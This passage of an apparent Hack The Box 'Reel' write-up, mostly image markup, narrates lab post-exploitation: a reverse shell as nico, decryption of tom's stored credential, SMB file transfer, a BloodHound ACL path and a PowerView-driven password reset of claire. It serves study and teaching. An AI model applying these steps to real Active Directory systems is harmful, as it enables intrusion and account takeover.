url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVR42m3P2Q6CQAyFYV5FJbijyIABBwYmskQUd9//TX4b9dKLL71oe9I6rrrhBh3zwFDYHlOeqZondn8jzTpxZOZrBm7IwAsZekpEjMbxX05SXlFJI4sH6vYpYXdsdSfRB7ZpS5zUokHFFTtzJIgsi3XGZJH+7JiKT11qHGM6/FXGRlkJfMhlF0qRFz3anEh1Ry5Xawmr2hfGXiikb+yZrW6/M/LJ3M9YhSVvI+FlL2EoQZUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="http server 200" title="" src="/static/26206e21f1563954329080f630e09de9/50637/http-server-200.png" srcset="/static/26206e21f1563954329080f630e09de9/dda05/http-server-200.png 158w, /static/26206e21f1563954329080f630e09de9/679a3/http-server-200.png 315w, /static/26206e21f1563954329080f630e09de9/50637/http-server-200.png 630w, /static/26206e21f1563954329080f630e09de9/ae072/http-server-200.png 679w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">nico</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 544px; " > <a class="gatsby-resp-image-link" href="/static/30d2c7b945c46adb756dc982d9ae0182/b0e00/shell-nico.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACUElEQVR42nVT2XabQBTzrzQ2izE2YRs2g23wksTZmrSn//8lqjTUadKkDzozzICudHWZuKsG0+SMafoMx7zCi3uk5QGb4Tu6/hnD8QeGm5/ImhtceTlmfoGpV9j1L0pM/2CyKk5IulckzR2S9gFVd4apTsiKI5bx1mKVbLGIWjjzgigtiTOv4AYX1G+kk6q9Q79/QkkFTXtLVY+o2jNykhb1DVKztwWkWOdpccB6+4g43yNgkcQccJ0NuHLNSNjuHnE8/+JLD2g29/zw2e51vtu/sNAt+sOr3euuWp/R7Z5Qd/ckYnvoxNS3dLFjSwpMwusOS0KXq2QDPV+nO0S0GfNsGXesnrNvxq5XToZvhLeoP1hWC6zChpW2rKzqsiaLeXm0a5z3tDSwyFhIq/q5jDdvgaiQoB7ObA/Xd7Z//Z6p0uZ688D9iy1iagaWD4jSrbUUpSqwp4Mejv9v0mPak6mbQZAVYSp7xIxVHauANnXvympu7cr67EvCYiSMqcD8sRkyOa0Z04yZniyb+oiM95eRuVj9kjAIa3iaL29UdYHHZgfLNXzeCzPfWMI5zwSF8iWhKalqtcaMSp13hEpa4ShpqdVQB3zPaDb5rPn7j8IKfkAr7ItUXkjnYYMFCYRg2ViF3qLiHzOq88Px7BNhyH9ZpFLo+lK2tclKmcLRjOp5TNXYUVLqER3YtN/11RJGnCn1UYTqZVFx8oXyZJWGUUfrJ7j8UAX0T8csMM7p8JlwvihpeQxFCtVPqQ5X7Vs4C+7tCJHQtcHQFd8Zw/po+Tegst7O35o1GwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell as nico" title="" src="/static/30d2c7b945c46adb756dc982d9ae0182/b0e00/shell-nico.png" srcset="/static/30d2c7b945c46adb756dc982d9ae0182/dda05/shell-nico.png 158w, /static/30d2c7b945c46adb756dc982d9ae0182/679a3/shell-nico.png 315w, /static/30d2c7b945c46adb756dc982d9ae0182/b0e00/shell-nico.png 544w" sizes="(max-width: 544px) 100vw, 544px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">cred.xml</code> within <code class="language-text">C:\users\nico\desktop</code> was an XML-based representation of a PSCredential object for the user <code class="language-text">tom</code> with an encrypted password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8df23695888e6801d18c3e1e753c2864/7f1ed/cred-xml.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABrElEQVR42lVS23baMBD0rzSYYHMxYBt8v2GMsbEhNEkb2qYn//8T01kBzcnDnFmtpNHurLQ475FtTojSDmHcIiYHcQMvrBFlHbyowXJVYm4XVzhXdryK+S3XG8Y1LLI+DqBFSYtie0ZenmHzwIhJYxpibMUK5izGdJHdkHKdYDQJyRHPRYwjmNNY8cDwoY15OWWVaX5UlabFCS5fn9s5FqxmtkxhsSKBiJoU+TZ0FR4eVxiM1jd40EXQZ2siKG1YyxxLt2SlpapmskiwcAsVq1bZ1oxnJBYbpvP0i6hueNCseYKclXnBjr7tsfJ38OlbELWqSmMm7V1bHFuJskAsEZa1tP9ImwRD81ahCG62T2i6C6r9K07nvzi/fKA7/UHb/8K+e8P+8Ib68FPlquYHcxc03BOU9YuCz6Fqp/M7qt0zqvoZLS91x99KWHBg3D+9K7Gmv2BTfVcPbomyfkXBtXDNfcmFyQFaVhxRcsqez2/g5HDoje1ev4l4KYORyQ9GK3q0/o+h6SnPBPd2lYdZ0cOcBHjQbcL5ZJnkjQc0XhfT7zDW6oH7I/eBiOA/K1csZw90EXsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cred XML" title="" src="/static/8df23695888e6801d18c3e1e753c2864/50637/cred-xml.png" srcset="/static/8df23695888e6801d18c3e1e753c2864/dda05/cred-xml.png 158w, /static/8df23695888e6801d18c3e1e753c2864/679a3/cred-xml.png 315w, /static/8df23695888e6801d18c3e1e753c2864/50637/cred-xml.png 630w, /static/8df23695888e6801d18c3e1e753c2864/7f1ed/cred-xml.png 673w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">Import-CliXml</code> can be used to parse the XML and decrypt the password, then the plaintext <code class="language-text">NetworkCredential</code> object can be viewed:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d46a5d321f80290e93aea901bd8cb82b/2fe53/tom-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.151898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtUlEQVR42n2PSQ7CMAxFcxXoPIYOSVvoXBAIgdQl97/Ix06FWMHi5dvOlwdR6gV1cwVrrhbEsic6Q5icEMmWoPzQI0w7illbk0dpZ/xJNiDNR1MXMT0pfTqeguUU8KMjbE/DchX2TmnYUZ2xyLN3+U+Tkp993hZ/cjGfV9wfL+j6gpg26sYnxmVF1dxo0ABJk2U+GXWCCravieongk/NiglB1MAPaxRqNufypkH8hc/fmum/Td+VRn2LAptPSwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="tom creds" title="" src="/static/d46a5d321f80290e93aea901bd8cb82b/50637/tom-creds.png" srcset="/static/d46a5d321f80290e93aea901bd8cb82b/dda05/tom-creds.png 158w, /static/d46a5d321f80290e93aea901bd8cb82b/679a3/tom-creds.png 315w, /static/d46a5d321f80290e93aea901bd8cb82b/50637/tom-creds.png 630w, /static/d46a5d321f80290e93aea901bd8cb82b/2fe53/tom-creds.png 674w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the credentials, I logged in over SSH as <code class="language-text">tom</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 445px; " > <a class="gatsby-resp-image-link" href="/static/b88a2779b69cb45d66869a32882712a5/a67f1/ssh-tom.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.911392405063296%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABVUlEQVR42oWRaW6DMBCFOUoKpEAWwmYgbA4EQ0No1kapql6g9z/A69jpn0qV+uPTWLPpvbFmhRuY0ZE4QA/PMDwBy8uR16+o+yvFUUUx3rEdbojKHfRZAuNPYmhOdoZdvcMvr+guX8jEHSkfIPZ3xZqPiIsdWP5C9JiHXA2bv4hhOjEMO4LWjx/YiBPyakDdHlCSIrbukG9GVNsjxT2WAYduRZitCsy9Ur0nzxF0m+GJosJiMGipxpsDxO6Ggiw2ZK3pLmpRRsoEWeTtCWVzREwKm47q/Rv8uCW2tLzCKmrgEW5YYzpLybKbwSUFy6BSTbIgmxy3QJgKlQuSVql0ljlsQi6UuYXP4SePnlVEf+EwaOP5Uylx6XNkYV3twbIeCd0tJ5VSaVoOdB95I7qXk5BFptCtmKwHmEx9IoBBp9BY1kFiLTI1JAf+Y/rD450qq6bESfANWdDmIj891wwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ssh tom" title="" src="/static/b88a2779b69cb45d66869a32882712a5/a67f1/ssh-tom.png" srcset="/static/b88a2779b69cb45d66869a32882712a5/dda05/ssh-tom.png 158w, /static/b88a2779b69cb45d66869a32882712a5/679a3/ssh-tom.png 315w, /static/b88a2779b69cb45d66869a32882712a5/a67f1/ssh-tom.png 445w" sizes="(max-width: 445px) 100vw, 445px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">note.txt</code> within <code class="language-text">C:\Users\tom\Desktop\AD Audit</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a6d833d88989e5ff74b644dcb005b43a/31682/note-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABo0lEQVR42nWS61aDMBCEeZYWuRMo96SUFqx4afUcff93GWeTVv/ojzkJG/Ltzm68vJpQtjOKZkbVn6123ZmxhXpEtjvCj3tswhbbqMM2bKjaKbrFZGV8E1Tw/LiFqo/UjCjfcz0RMkE1LknZLBYuYIEK3I8Hq23cOTBBG6saXqz2CHODMDMI0oGrRlockJVOEeMJv9Nysgldle0NVLt91BMuCTS8zqwIksEeBEmPVI3Q4xuG8RX6cGESbatv9ApzvNpkD/xPwH7Ee6L4V15JWw/So6BByYvL0yfaYUXBvZmuiJlArKrqZL/H0wcSdWAB/wDFUkwrCS/Kj2kx2ipkL7qfp8VEB5qJ2x/Yn8CWVkZaUWx6wYFIxVKdqmZblSTK2L+c5wJ0MFoORTcgtWFM5DXDE3rzAlndMCYLz34G42BSZcXnJMlk8hIrm0e+gDNfwIxdvyKvF1dhzbcnfRNAIvZoNS+PNoEo352s/YwxSSC6tyQnLEgNn5GGTwcW2OlnVvkMw6nq/Ztd99MFh/kdy/plAdJDAUpl2T0ZgUqAieHgnPVv6wg9MzDAw70AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="note" title="" src="/static/a6d833d88989e5ff74b644dcb005b43a/50637/note-txt.png" srcset="/static/a6d833d88989e5ff74b644dcb005b43a/dda05/note-txt.png 158w, /static/a6d833d88989e5ff74b644dcb005b43a/679a3/note-txt.png 315w, /static/a6d833d88989e5ff74b644dcb005b43a/50637/note-txt.png 630w, /static/a6d833d88989e5ff74b644dcb005b43a/31682/note-txt.png 670w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors</code> contained <code class="language-text">acls.csv</code> which could be uploaded into BloodHound to map out any privilege escalation paths:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 556px; " > <a class="gatsby-resp-image-link" href="/static/12c2f6b0c8d33c14db5ffbd319400be4/9d173/bloodhound-ingestors.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 40.50632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdUlEQVR42j2S63aCQAyEeZO2CgqKoC53AQEvbS1qqz96Tt//PaaZYPsjZ5dN8u1MFis0DRarGqu4wzJqYdK9xjoZYhXtdDXpEVF20LooO+pZsGZvA9vLMJ6mGLsZrBfHwPULzIIS3mIDx0t15fcsqOAv68ee+RLzsJaQ879V8oT6y62C/4GhaSWxVdhw89AQSnEg51TKpiFqcdNJj7hiSI5Qx8th0QYLnu21yI4xmkS6DwUai7WhsQEv5kUmPcCIXV78NDZSHz8igU3LLGATDx0vURAbiuoDkeTq7oKy6TXP2ZXNBVl50j0dOGLTdlOdoQKpbh6Wqs5xE2y7K7rDHVVzhjsvULVn3TNPa83+hrzq0R5uKOpe4UsZ11RqCbb4alRli9WJAJvdJ9r9l0AuAsxF6UlUnTGaRgK/4nj6VpVv/Y9A7+iOdxnNq76DAn1R58s8CHSmidqMHnOaiB2OwyQ7VcjfKd286y/DkRAU54RtdCQE/gJ8gQPrb74G5QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="BloodHound Ingestors" title="" src="/static/12c2f6b0c8d33c14db5ffbd319400be4/9d173/bloodhound-ingestors.png" srcset="/static/12c2f6b0c8d33c14db5ffbd319400be4/dda05/bloodhound-ingestors.png 158w, /static/12c2f6b0c8d33c14db5ffbd319400be4/679a3/bloodhound-ingestors.png 315w, /static/12c2f6b0c8d33c14db5ffbd319400be4/9d173/bloodhound-ingestors.png 556w" sizes="(max-width: 556px) 100vw, 556px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To download <code class="language-text">acls.csv</code>, I started an SMB server with <code class="language-text">impacket-smbserver</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 588px; " > <a class="gatsby-resp-image-link" href="/static/a6afca9c43271e60b18a3af538a108a7/7a752/start-smb-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJUlEQVR42nWP226DMBBE+ZU2JNwSbO6XADYmQBFNRNpE6f//yHRx+1JVeTjanfXOyGvYrIKVLrDzO6xkgZOMKNsrVH/DMH1Bjg/k9Yytk8G0U6o51Uyz9js3/zMzgrhDWp3BswE87amOCIsZ2XFCJS9aB0kHPxSI8x7u4Yg9F0iKESxS4MQhkFhz1mCDBwJFORAjMjLonsIYLbl7MvsVPFbD82syNrp3abbnDWmhwzzWwDnQpV4JI8l6tN2C0/CJRp4xzQ9IdUElzhBqgeyu9HZDTb9dEaQr2qsJ1X9A/b6l5Rt4rOjkqIU6LVAUKloyiXeM0x08lHgxI2x2ieZ1G2u0tkjrSrPdDxsr1RhrGKNT1gBGJ/i8RhBJOF4BkxZNWnqK/Z9vTQ3E1UX0aGAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="start smb server" title="" src="/static/a6afca9c43271e60b18a3af538a108a7/7a752/start-smb-server.png" srcset="/static/a6afca9c43271e60b18a3af538a108a7/dda05/start-smb-server.png 158w, /static/a6afca9c43271e60b18a3af538a108a7/679a3/start-smb-server.png 315w, /static/a6afca9c43271e60b18a3af538a108a7/7a752/start-smb-server.png 588w" sizes="(max-width: 588px) 100vw, 588px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Connected to the share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/957d139ec8bdf6ebe3f139edfcda27cb/70582/net-use-z.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 9.49367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAdklEQVR42j2NWQ7DIAxEc5smLAHSbIUAIt1U9f7nmUxQ1Y/Re7ascaNdhh0LzLVgmB/0vbqb7n+vGU7ukCbVKJvQqo2eoVyBsCRvmnF5Yt0+mP0bPn0rp9sLa+COPB9KE38lGZ0OLAoQfcRFerQ6outZzlnYhAOAe0EUYBwyLAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net use z" title="" src="/static/957d139ec8bdf6ebe3f139edfcda27cb/50637/net-use-z.png" srcset="/static/957d139ec8bdf6ebe3f139edfcda27cb/dda05/net-use-z.png 158w, /static/957d139ec8bdf6ebe3f139edfcda27cb/679a3/net-use-z.png 315w, /static/957d139ec8bdf6ebe3f139edfcda27cb/50637/net-use-z.png 630w, /static/957d139ec8bdf6ebe3f139edfcda27cb/70582/net-use-z.png 689w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Successful connection from <code class="language-text">REEL\tom</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/70ba5a1cffb308f18ca6fe4408ca3308/ae072/smb-connection.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/UlEQVR42lWQ2W6DMBBF+ZW0SvtcNTQbNCaAAW8sgoQtrfr/H3E7NhVSH47GHnvOjO2FF4U0a8GiEnFaI0oaBBcNFlcImSYM3vwYz68+NtuFp5eFzXb3D5vzgk8Jdi1xTWqKxkUrtcLI5qw4Mvg4ZdgdUvjHDO/71LE/FziG0nGmIWzO43mLXNyQ8AacJrV7XtxQyAGmekDqCUKPyGWPQg9Q1QxpZqiSoHOLbr5Qdz+IeQvP0AVTTqjqB2o6WPazk0gzOYQioRqclFPzgtYWKzPNNzUaoame0cu8LO+QFx1NdKfCfo25uCMT/SpWf02sSJgRAVPr0y3+gbu//gWlO7aqbQVa7gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smb connection" title="" src="/static/70ba5a1cffb308f18ca6fe4408ca3308/50637/smb-connection.png" srcset="/static/70ba5a1cffb308f18ca6fe4408ca3308/dda05/smb-connection.png 158w, /static/70ba5a1cffb308f18ca6fe4408ca3308/679a3/smb-connection.png 315w, /static/70ba5a1cffb308f18ca6fe4408ca3308/50637/smb-connection.png 630w, /static/70ba5a1cffb308f18ca6fe4408ca3308/ae072/smb-connection.png 679w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Copied <code class="language-text">acls.csv</code> over to the <code class="language-text">smb</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 623px; " > <a class="gatsby-resp-image-link" href="/static/a84e7b98cc9b9eecb0b39afc15827fa9/5dd04/download-acls-csv.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 8.860759493670885%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfElEQVR42iWLUQ6DIBBEvY1NjdCiRURAtJhqpI396/0vMl3w42V2ZnaKVi2Q+gVlNmi3w/gIbXcMLtL9zt76D9x8UB/hwxc99WnDmwlXZgmXudQGhXg8scYfumFFWSkkz4XHnVTIk1s7kw+UT2i6JZMyIUNWRv+MuoqP+AN+60OInSBRHAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download acls CSV" title="" src="/static/a84e7b98cc9b9eecb0b39afc15827fa9/5dd04/download-acls-csv.png" srcset="/static/a84e7b98cc9b9eecb0b39afc15827fa9/dda05/download-acls-csv.png 158w, /static/a84e7b98cc9b9eecb0b39afc15827fa9/679a3/download-acls-csv.png 315w, /static/a84e7b98cc9b9eecb0b39afc15827fa9/5dd04/download-acls-csv.png 623w" sizes="(max-width: 623px) 100vw, 623px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 507px; " > <a class="gatsby-resp-image-link" href="/static/97fd4c982b5da511b472a7b2ecd292fd/4dbef/acls-csv.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 13.29113924050633%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuElEQVR42kWM226CQABE+ZTuggpWYOW2yiWlEgTXGC2ppun//8fpVhN9ODkzDzOOyCdkccXTN7yk4z1t6M2V7vDN5zjRH2+Y8y872xeqQvoZ7lIjg+KJ8F/ZKfKeMG6RyRFv3TO3p9HWEOqRePNAlf99YKY+kFHLbLVlqRrmYckiqgjimkDV+NbOPq8pQ81b/oVXTLjWIrsgkhMi3iOUsRyQ1u56xN382HGDbgyrtEXpjqwa7qTlwB+ZcWJOXCpqpAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="acls CSV" title="" src="/static/97fd4c982b5da511b472a7b2ecd292fd/4dbef/acls-csv.png" srcset="/static/97fd4c982b5da511b472a7b2ecd292fd/dda05/acls-csv.png 158w, /static/97fd4c982b5da511b472a7b2ecd292fd/679a3/acls-csv.png 315w, /static/97fd4c982b5da511b472a7b2ecd292fd/4dbef/acls-csv.png 507w" sizes="(max-width: 507px) 100vw, 507px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>For compatibility with the CSV, I needed to use BloodHound version 1.5.2 (the version around the time that this HTB machine was released) which also required an older version of neo4j within the 3.5.x range to successfully connect to the database, 3.4.5 worked.</p> <p>After uploading the CSV, I viewed Outbound Object Control for the user <code class="language-text">tom</code>. First Degree Object Control showed WriteOwner permission on the user <code class="language-text">claire</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d7bc6f0b2138c73936640187f32a43fc/dfb88/tom-first-degree-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.9746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVR42o1RS04CQRScK7h0w6U8hIdw5c4L6AoSFyZGE4gBP4FEM2GYT8+H7p7+4EA8S/m6GRiCmrioxat+Va/e60AphR/QGsbBaEgpUVZLyLr2teN/1bQIjgkncCasKBFnDHGaYR7HSFiORco8XzvzP4wD9yikoEJDUxMrCkRJhrysiJe+yRoD5fskCuKdcV6W3rTTt4bOZP3ZUKraN2aUQOltUu1TdEm07lZO8wIL2sAai3XTdIZVVWI8fcWcHjkXWFkLfWDgE3C+r3dCl3rJJabvH3h+m9AGreFgeIve2Qme7u7BhKB7pT6pQ5zlCKMYMxJFdEt/02zLz5MUSqxwcX2J0/MeeM5hrEEwnr6gf3OF2cMjJE2t6U4u1SHc5GPOgdFHDScj9EcDhGEIQYECTVHXzRcUrapa8X/hf1sZbOxmP/gbvc4dcJ9W6YMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="tom First Degree Object Control" title="" src="/static/d7bc6f0b2138c73936640187f32a43fc/50637/tom-first-degree-object-control.png" srcset="/static/d7bc6f0b2138c73936640187f32a43fc/dda05/tom-first-degree-object-control.png 158w, /static/d7bc6f0b2138c73936640187f32a43fc/679a3/tom-first-degree-object-control.png 315w, /static/d7bc6f0b2138c73936640187f32a43fc/50637/tom-first-degree-object-control.png 630w, /static/d7bc6f0b2138c73936640187f32a43fc/dfb88/tom-first-degree-object-control.png 733w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Transitive Object Control showed that <code class="language-text">claire</code> had WriteDACL on the <code class="language-text">backup_admins</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f0459e538dded890d83613a342d0e1aa/be3f7/tom-transitive-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABo0lEQVR42pVTy0rDQBTN3/kLCu50JfgLuhGELsQHIqK46EoUdCXWQtOHrXk0TWYmmUksFpV+yPHeaStVI7SLA8k8zj3n3DtOmqZYFMpCIdc5XpVGmv094yxL9jn6wEH1CGv7WxiaN7u2NGGWZdA6QxTHqNVdnFTPsFu9Qrcb0L5cjlATWSIkOi8+2j0PfhhCxQK5SNGP+lDqH4VSSQgppgcyq4rtNNsdInrBIEmsSq05O9rLJspLM2SSIi/wPnqHMcb+M4HfjzAgm6ySoRRdYvzK7QchX2aSRqOBymEFgRfYBsSJmCidFly0eQ7bHI/G2NjZhLPtYK+yj0wXEEJMm6EnNuc7TgU4onKFJF8lChfXl1g9WMf1/S06Xc/m9kyN4Az9ICTy2SVF34ZcDUutO6wiCAN4RCKeBUI/QJLEVp2UEh6R9TwfYTSgsUlIHY3PwEO3V6czurwpbMnkBrqY2Jt1j/MzvEfgXCXFo/UID4/HOD1fgRT5nPJfY8O5zFD6UmjddV20Wi081R5xd3eDZrNFcBFF0bcIZ6m3bAvK6ZyaUgFfQYN00t61VK8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="tom Transitive Object Control" title="" src="/static/f0459e538dded890d83613a342d0e1aa/50637/tom-transitive-object-control.png" srcset="/static/f0459e538dded890d83613a342d0e1aa/dda05/tom-transitive-object-control.png 158w, /static/f0459e538dded890d83613a342d0e1aa/679a3/tom-transitive-object-control.png 315w, /static/f0459e538dded890d83613a342d0e1aa/50637/tom-transitive-object-control.png 630w, /static/f0459e538dded890d83613a342d0e1aa/be3f7/tom-transitive-object-control.png 639w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">PowerView.ps1</code> was already on the machine, so I used <code class="language-text">Set-DomainObjectOwner</code>, <code class="language-text">Add-DomainObjectAcl</code>, and <code class="language-text">Set-DomainUserPassword</code> to reset the password for <code class="language-text">claire</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d56c4ebd80aaea11465625f15640e93d/62d75/powerview.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 51.26582278481012%; position: relative; bottom: 0; left: 0; background-image: 